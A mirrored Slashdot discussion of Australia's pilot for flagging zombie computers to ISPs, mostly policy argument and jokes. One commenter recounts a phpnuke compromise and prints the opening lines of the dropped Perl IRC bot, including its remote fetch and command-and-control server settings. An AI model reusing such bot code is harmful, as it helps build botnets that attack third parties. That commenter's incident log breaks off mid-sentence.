Slashdot Mirror
AU Government To Pilot Target Zombies
msblack writes "
Australian news sources are reporting that the communication regulators will begin notifying ISPs of infected customer computers. In a three-month pilot program, the Australian Communications & Media Authority will identify zombie computers and ask their owners to clean them or risk being disconnected. When will U.S. regulators and ISPs get on board?"
"When will U.S. regulators"..."get on board?"
Well I hope never. ISP should have rights to protect their network so they should be allowed to stop Zombie systems when they feel like it. But for U.S. regulation. I say No way. All regulation does is make loopholes for the bad guys and road blocks to the good guys. ISP should be willing to work with their customers to insure this doesn't happen, that is why a lot of ISP are offing free protection software to their windows users, partially because other big names are doing it so they can stay competitive, and partially because with less spam and viruses on their network they can more easily manage it. With US Government control it will be like your system is a Zombie and Fix it. To most people who only have a passing idea what a virus or spyware/addware is, most really won't know much how to fix it if it doesn't require clicking one button and then selecting the default for all questions. So if it is anything of a difficult fix, or requires hireing expensive techs to fix it they will toss their computer saying it is broken, or sue ISPs and the Government for disconnecting their ISP without giving them a means to remove it. Also systems like P2P, BitTorrent, and some distributive computing systems, all with legal uses, could be considered a zombie system to some some people like the Entertainment industry and can use that to force all people using the technology even for non entertainment uses (such as downloading Linux distros)
Government control adds rigidly defined rules to a flexible universe and often will cause more harm then good.
If something is so important that you feel the need to post it on the internet... It probably isn't that important.
Zombies are just one type, we need to start identifying the Vampires and ghouls.
They cause MUCH more havoc than simple zombies.
liqbase
msblack writes "Australian news sources are reporting that government officials will begin deploying infected pilots. In a three-month pilot program, the Australian Communications & Media Authority will identify zombie citizens ask their caretakers to submit them or risk being zombified themselves. When will U.S. regulators and military get on board?"
and how long will it be before they ask my ISP to disconnect me because I'm running P2P software, making me a dangerous music thief?
slippery slope!
Seriously, how hard is it not to press the big red "No" button on a dubious site that asks you to install software that tracks the weather/vaccums your carpet/makes coffee? The warning is quite clear on all the browsers, I think, why are people still doing it?
Send email from the afterlife! Write your e-will at Dead Man's Switch.
Pilot Target Zombies Yup we're flying these new fangled target zombies around.
No France
Sorry, couldn't help it.
Will Uma Thurman star?
In a three-month pilot program, the Australian Communications & Media Authority will identify zombie computers and ask their owners to clean them or risk being disconnected. When will U.S. regulators and ISPs get on board?
Our local cable and DSL providers are always shutting connections off for userse who's computers are virus-ridden. If your PC is acting as an open spam proxy or found to be connecting to zombie-networks, they shut you off, and you have to call to find out why. They recommend a service or software to help clean your PC, and they won't let you back on until you're free of any malware.
It's been like this for...years?
Pure, raw, unadulterated situation: congress doesn't care. The big ISPs don't care. They have had 10 years to address the situation and have refused all along. They are, however, willing to pass laws preventing unsecured wireless access points. Given a choice between lending support to MPAA/RIAA or actually addressing a serious problem, be it hacking, phishing, worms, viral attacks, DDOS attacks or any other legitimate issue.... look at it like this: how quickly have they acted to prevent the zombie issue? How quickly did they act to try and sneak the broadcast flag into law. Again? Or again?
Start writing campaign checks and picking up the tab for "fact finding missions" to Hawaii for a senator or ten... then you might find some interest on the hill.
If the g'vt kept the data on you that google does you'd better believe you'd be calling it "doing evil"
I got my hopes up for a second. I though, "Finally! Those fat cats in Canberra are taking some action to prepare for the immanant impending zombie pandemic."
My elation was premature. This is just some lame story about computers sending spam.
Come on people! We need to start stockpiling canned goods, fresh water and shotgun shells now! If we wait until the first reports of infection, it may already be too late!
Slashdot: 24 hours behind every other site or your money back!
It would be cool if ISPs proposed some anti-malware strategies to their customers, maybe send some Linux distro :)
I agree botnets are a problem and that my ISP has a right to stop me from being a nuisance to the rest of the internet. But outside of that do I really want my ISP taking broad arbitrary decisions on what I can do with my connection?
"Don't belong. Never join. Think for yourself. Peace." V.Stone, Microsoft Corporation
We should be able to find a technical solution to this without having to get the government involved in what amounts to censorship. I'm not saying we don't have a problem, but I am confident that the last thing we want is to have hundreds of additional employees at the FCC regulating traffic on the internet and sending nasty letters to people asking them to conform or be disconnected.
Think about what would happen if the FCC were running around sending letters to people about computers that might be sending traffic they've deemed as disruptive? Couldn't the administrators at the FCC just use that as a pretext to monitor for P2P traffic? No thanks, Big Brother.
------ Tim O'Brien
"AU government to target Microsoft's indifferent security"
How many zombie movies do we need to point out that the government experimenting on zombies is very dangerous and foolish? Get rid of the zombies with a bullet or whack to the head and be happy.
Comment removed based on user account deletion
From the article: "Anthony Wing, manager of the anti-spam team at the ACMA, told ZDNet UK sister site ZDNet Australia that the application, which took "some months" to build, can identify computers physically located in Australia that are being used for "illicit reasons".
"[The application] identifies IP addresses that have been used for illicit reasons -- for example spamming," Wing said. "There are a range of sensors around that world that identify them. Those infected IP addresses are then fed to the relevant ISP. They know who their customers are so that can contact them... if the computer remains a threat to other Internet users, the ISPs may take steps under their acceptable use policy to disconnect the computer until the problem is resolved".
...The ISPs will then be responsible for contacting their customers and helping them disinfect their computers.
This is great, assuming that:
$nice = $webHosting + $domainNames + $sslCerts
If there are the right incentives, the zombie problem will go away.
E.g. if the user somehow feels it is necessary, he'll take care of his machine.
I know of people who know full well their computer will get infected with malware. They do it anyway, because they figure it won't cost them anything. Their ISP won't bug them, nor the phone company, nor anyone they DDOS, etc. They simply don't care.
That's why I want multiple waves of hardware-destroying worms. Worms that ruin your mobo month after month, until people wake up and see that proper administration is good for them too.
Another possible incentive would be to fine ISPs for allowing machines on their netblock to send out spam or do other anti-social things -- but that's going to be less effective, because an ISP can't fix the problem on a user's machine. All it can do is disconnect it, and that just leads to support calsl and whining from the (l)user. Which is why it isn't done (duh!)
http://www.thebricktestament.com/the_law/when_to_
I think not. Free speech does not include the right to shout "Fire!" in a crowded theatre, and free use of the Internet does not include the right to allow your machines to stuff it up for the rest of us.
As a Telstra customer who saw his cable connection slow to about 1/100th of its normal speed thanks to the DNS attacks of a few months ago, I'm glad to see someone doing something about the problem.
Il n'y a pas de Planet B.
I'm a broke geek. I host my website on a machine on a machine in my house. Last few weeks i've caught my machine being used for zombie purposes. Attack vector was a vulerability in phpnuke.
/tmp -al . ..
/who 0 and found an IRC op from IGS.ca Below is a log of the chat I had with him.
.bigfirex. in a channel called #testebot.
Let me explain "why I use that holy peice of shit"
The website has a decent sized community. It's also going to be a pain in the butt transferring to something else (i'm thinking vbulletin) and i've never had a problem before the recent round of nuke upgrades. 3 according to the advisories the only patch is to get off phpnuke (again, wonderful)
So today the website freezes up again. Thanks to the fact that i'm dot com broke now I basically sit here all day updating my forums, reading other forums, getting up ocassionally to warm up a microwave burrito and wait for the day Bill Gates makes all of us former window admins disapear to redmond in the great microsoft rapture of 2006.
Ok.. SSH into the machine. Same as before, same exploit.
poo:~# ls
total 20
drwxrwxrwt 5 root root 4096 Nov 6 14:55
drwxr-xr-x 22 root root 4096 Sep 16 14:38
drwxrwxrwt 2 www www 4096 Nov 6 09:40 r0nin
drwxrwxrwt 2 root root 4096 Nov 6 09:40 bot.txt
drwxr-xr-x 2 root root 4096 Nov 6 10:00 enviar.pl
Oh you sons of bitches, you done gone fucked with an admin with nothing better to do than to track you down. I firewalled off port 80, copied the offending files out of tmp and change permissions. Googling revealed r0nin is some kind of shell server. Since 80 and 22 are the only ports open to this machine, they would run it on 80, crashing my website.
Then I looked at enviar.pl. It was just a stupid email script. Nothing notable.
Finally I looked at bot.txt.
# IRC
my @adms=("bigfirex"); #nick dos administradores
my @canais=("#testebot");
use LWP::Simple;
my $dados=get("http://66.185.162.241/...fusao/nick/in dex.php");
my $nick=$dados; # nick do bot.. c o nick jah estiveh em uso.. vai aparece com um numero radonamico no final
my $ircname = $dados;
chop (my $realname = `uname -n`);
$servidor='irc.igs.ca' unless $servidor; #servidor d irc q vai c usadu c naum for especificado no argumento
my $porta='6667'; #porta do servidor d irc
Ahh here it got interesting. I now had a IRC channel, with a room name. I tried connecting, but my machine was banned from the irc server.
I ended up ssh'ing to a customer account I had running at he.net, and firing up BitchX from there. A few minutes later I was in the chatroom #testebot with our magical master of ceremonies "bigfirex"
I sat there for a while seeing folks pop in and out. I asked the room "could you tell me exactly how you're exploiting my machine and would you please not do it again?" No answer from bigfirex.
I decided to ask an IRCop for help. Surely seeing the evidence (I could have provided him shorewall and apache logs) he would take immidiate action banning this guy from the network.
I did a
[msg(elsif)] hi are you an ircop?
[elsif(jake@admin.igs.ca)] sure
[msg(elsif)] someone on your network hacked my webserver and installed a bot, i tracked them back to here
[msg(elsif)] The bot is being run by a user named
[elsif(jake@admin.igs.ca)] sucky. you do know that he.net runs a server on this network, irc.he.net?
[msg(elsif)] actually im just using a shell i have there, the ip for my comprimised machine was banned from this
network
[elsif(jake@admin.igs.ca)] k. I don't know what I can really do for you. I don't know that person and all.
[elsif(jake@admin.igs.ca)] lots of machines are compromised with ircbot trojans that come here in order to get their
> When will U.S. regulators ... get on board?
Never, I hope. Do you want to be forbidden to use an unlicensed operating system?
Hint: I think you meant to write "law enforcement" rather than "regulators".
Warning: this article may contain humor, sarcasm, parody, and perhaps even irony. Read at your own risk.
What are the privacy implications of a government doing this?
I am all for some sort of system that finds a way of shutting down bots and will even admit that I would not mind seeing user's required to care for their computers (making them responsible for what is on their machines). Having said that, my experience is that so far in the cyber-world, governments have not been able to pass legislation that deals with these kinds of things in an effective manner. Governments are too much "brick and mortar" to really grasp the ether qualities of the cyber world.
The lesson that I think should be taken from this actions are that "we" (internet users and providers alike) should be finding ways to self-regulate so that we do not have to deal with big brother deciding to do it for us.
There are places where the two worlds need to cooperate and come together. Some laws need to be written to deal with crimes unique to the cyber-world for instance.
"When will U.S. regulators ... get on board?"
Never , because alll U.S. lawmakers are in the pocket of Big Zombie.
Ok, I'm sory guys, it's time for me to fess up. I'm on this task force and what actually happened was this. Me and the other sys admins for the AU Gov were sitting around playing DooM when our Boss walked in and yelled "what the hell are you guys doing?! The good tax payers aren't paying you to play games..."
;-)
We had to think of something quick so I told him we were cleaning infected zombies from the network, which, if you think about it, is at least partially accurate. He then left muttering something about "keep up the good work" and next thing I know suddenly all the other managers and politicians want their networks cleaned. Now it's a national headline.
Hey! My bad!
How can you suggest murdering all those innocent zombies that never harmed anyone outside their normal feeding habits? You insensitive clod!
Zombie Rights!
And you nailed it - the problem is what the definition of a "zombie" is. I'm pretty sure they could make a good case for just about anything.
We don't need that kind of regulation. No way.
- It's not the Macs I hate. It's Digg users. -
Hopefully never. Well, U.S. regulators anyway.
ISP's should be protecting their own networks. Saved bandwidth costs alone should be enough reason for them to want to detect and block zombies. The last thing we need is more government intervention.
http://www.hardcorepawn.com/zombie4/
I'm pretty sure (sarcasm) that in the past, there's been a number of IE vulnerabilities that allow this crap to be installed without any user notice. And it might not even come in with IE - it might come in some other way that the user is completely unaware of.
- It's not the Macs I hate. It's Digg users. -
Seriously, if you are not a geek, you wouldn't even know what the term "Zombie" even means... Why don't ISPs and others take out a TV/Radio campaign to say "Are you at risk?" The common people will then perhaps think, maybe my computer IS unsafe and attempt to do something about it...
We need to start stockpiling canned goods, fresh water and shotgun shells now! If we wait until the first reports of infection, it may already be too late!
How do you say "evil zombies" in French? "Malfaiteurs de Zombi?" I bet some people are wondering that right now (since they can't get to work this morning, what with their cars having been torched by nocturnal zombie throngs). Le *sigh*.
Don't disappoint your bird dog. Go to the range.
Brains!!!!!
Firstly, having SPAM/DOS attacks going out of your network cant be good for PR or business.
But more to the point, having this stuff on their network spewing data chews up bandwidth (and bandwidth isnt free)
A good place to start is for ISPs to block ports known to be used by these zombies (e.g. the port that the "owners" of the zombie network use to send commands/targets/spam messages etc to the zombies). Blocking these ports probobly wouldnt cost very much and would (in theory) stop the zombies from actually being given any instructions.
Is it illegal for me to make my own network into bots for distributed computing? Will I need a "bot license"? Maybe notification is a government service, but mandatory bot disconnection is invasion of my privacy. And with government's error rates, it's another threat to my nonbot computers.
--
make install -not war
Where do I get a remote control to pilot these "target zombies"?
Why do people drive drunk?
Why do people speed?
Why do people not signal their lane changes?
People are going to make mistakes, whether it be malicious, idiocy, or the warm coating of ignorance, they will do things that can potentially harm others. There are laws against most of the things people can do to harm others, but not yet on the Internet.
Why is this? Why must I put up with having my cable modem constantly being scanned? Why, when there is nothing happening on my system, can I generate a several-meg tcpdump log that contains hundreds of scans that keep a constant noise-floor of traffic going?
People are dumb. The government should have laws to protect me from dumb people as much as possible.
--
Internet Explorer (n): Another bug -- that is, a feature that can't be turned off -- in Windows.
wasn't halloween last week?
Qantas has had John Travolta flying his 707 with their paint job for years now.
One line blog. I hear that they're called Twitters now.
Read the article again, folks: "IP addresses that have been used for illicit reasons -- for example spamming." (emphasis added)
The Aussies are after all kinds of zombies, not just spam zombies. Zombie PCs can be (and have been) used to launch DDoS attacks -- and IP spoofing works just fine for these purposes. I said illicit computer operators could spoof their IPs, not that they could spoof it to send spam. Read more carefully!
$nice = $webHosting + $domainNames + $sslCerts
This is white-hat hacking at it's best. Can we get a +5 over here, please?
"Now this morning, we will begin piloting these zombies, identified here, here, and here. Your mission is to stop the spread of this nonsensical idea that Foster's is Australian for beer."
Some of these titles are not exactly the clearest things in the world. Perhaps "Australia's New Pilot Project to Stop Zombies" would have been better?
Other than that gaffe, on the topic, it isn't the place of governments of democratic republics to engage in attacking malware on the citizenry's machines. It is the job of the citizenry and when government Internet connected resources are beseiged by this crap code then they should be taking up the issue with ISPs and notifying them and holding their abuse departments' feet to the fire on this. Otherwise they should leave the public at large to deal with this themselves. Next thing, they'll tell us what apps they consider malware. Oh wait, that whole DMCA and copying and decoding software nonsense...
If my grammar and spelling are off, I am [distracted/tired/careless] (take your pick)
Personally (and as a network sysadmin for a building network... not an ISP, but close) I'm all for restrictions on what happens on the network. In my building, if I don't notice what you are doing, I'm not going to stop you; however if I notice something causing problems for the rest of the building (zombies, spam, P2P, whatever) I'm shutting your ass down. And yes, I have shut down P2P users.
you should read everything on the internet as if it had "but I'm probably talking out of my ass" appended to it.
I worked for a small ISP in the US and we were dilligent about getting users to clean their PCs. If they didn't comply, their service got turned off until they could. Primarily we used IDS to detect zombies and such. But sometimes they would actually affect the service of other users. It really isn't that bad if you keep on top of it. But of course, it is a small ISP with no more than 10,000 users. Maybe Comcast, et al would find the initial task of identifying and notifying thousands of users to be daunting.
-matthew
"THERE IS NO JUSTICE, THERE IS ONLY ME." -Death
Bill Stewart
New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks
Bah, Iowa telecom have been cutting their users off for some-time now, they get a warning and then they cut you off, i know cos once these people get cut off they come to me to fix it up for them, it's a lucrative deal for me as my small company is building a reputation for getting it right first time, but i personally feel that we should be hitting HP, Dell, etc to stop installing crap spyware infested software to begin with, and to build pre-installed clean computers with adequate protection right out of the box, still the users themselves are to blame too, as well as MS for leaving all the doors open in the name of useability!!! it's funny reading this article as i have another 2 computers waiting to be re-installed and setup cleanly!
Specifically Roger highspeed cable internet provider. They have disconnect a few of my client's computers, due to being infected with some trojan/spyware/virus etc.
After my clients said on the phone, that "I will try and maintain a infected free computer , and run current antivirus software", they reconnect my clients.
I don't actually so mind that they disconnect people, if they are infected with some sort of virus. Saves the rest of the people from being infect.
Money cannot buy happiness, but can buy something soo darn close, that you can't really tell the difference
I for one enjoyed the hell out of sniffing traffic coming from bots/spammers, and loved to do nothing more than de-authorize someone's cablemodem's MAC address :)
Then, when they called to bitch, we told them to take the box to a computer repair shop and get it a clean bill of health, or wipe it and come back when it's clean.
If people with brains set abuse policy at ISPs, they would not have to monitor or go looking for infected machines. http://www.spamcop.net/ notifies hundreds of ISPs daily that machines in their network are spam bombing the world, and most (especially the big ones, like Comcast and Roadunner), do not do squat about it.
Policy should be: "If your machine sends spam, even without your knowledge, you WILL be disconnected."
Same policy should apply to virus-infected machines, but the big ISPs just do not give a flying fig. Every time some clueless user's machinme starts sending me viruses, I report it to the source ISP. Smaller companies usually take action and at least notify the customer. But when it is a big ISP, the virues come daily (sometimes multiple times daily) for weeks on end. The real pisser is the source IP address is always the same, so identifying the infected machine is not diffucult, they just won't do it.
Ignorance is curable, stupid is forever.
Unfortunately, too many ISPs apparently don't enforce forgery-protection, so UDP-based attacks can still work, and it's hard to trace them back to their source. A couple of examples of attacks include the Slammer worm which used very small UDP packets to attack a database, and many of the DDOS attacks which send a small request "from" the victim to servers that send a big response (e.g. DNS smurfing attacks), allowing a low-bandwidth attacker to trick other machines into sending a large attack against the victim. There are large ISPs that enforce spoof-proofing, but it's not everybody yet, or attacks like this would be much less common.
There are special cases - if a customer is multi-homed to multiple ISPs, the ISPs have to be careful not to mess up the multi-homing (typically by adding routes to their tables), and if a customer has a block of addresses (e.g. a /24 with 253 addresses), customer machines at that site can forge packets "from" other addresses at that site, but that's a less important attack because you can still trace and filter that attack traffic if it's attacking you.
Bill Stewart
New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks
People who are to lazy to clean thier computer will claim it evolved its zombie like behavior and its not actually the work of an intelligent entity outside of the computer ;)
The us doesnt regulate, it just declares war!
:)
War on terror, War on Drugs,
War on hurricane katrina (I saw the army kicking doors in on TV)
Now a war on Zombies... that's right up Bush's alley
...ISP's are providing total security suites to protect their customers against internet plagues. If an ISP customer is protected by his ISP's security suite, he can't be blamed for it's not working properly.